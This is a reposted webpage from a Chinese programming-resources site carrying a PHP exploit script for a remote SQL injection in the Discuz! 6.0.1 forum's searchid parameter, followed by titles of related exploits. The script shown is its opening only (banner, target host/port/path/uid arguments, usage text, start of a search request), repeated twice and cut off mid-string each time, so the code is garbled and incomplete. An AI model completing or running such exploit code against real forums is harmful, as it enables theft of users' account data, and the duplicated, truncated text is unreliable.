您现在的位置是:网站首页> 编程资料编程资料
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit _Exploit_网络安全_
2023-05-24
272人已围观
简介 Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit _Exploit_网络安全_
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}
$content ="action=search&searchid=22
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}
$content ="action=search&searchid=22
相关内容
- Sun xVM VirtualBox _Exploit_网络安全_
- BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit _Exploit_网络安全_
- Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC _Exploit_网络安全_
- Belkin wireless G router ADSL2 modem Auth Bypass Exploit _Exploit_网络安全_
- Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit _Exploit_网络安全_
- NoName Script _Exploit_网络安全_
- GeekLog _Exploit_网络安全_
- Dana IRC 1.4a Remote Buffer Overflow Exploit _Exploit_网络安全_
- Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit _Exploit_网络安全_
- Simple PHP Blog (SPHPBlog) _Exploit_网络安全_
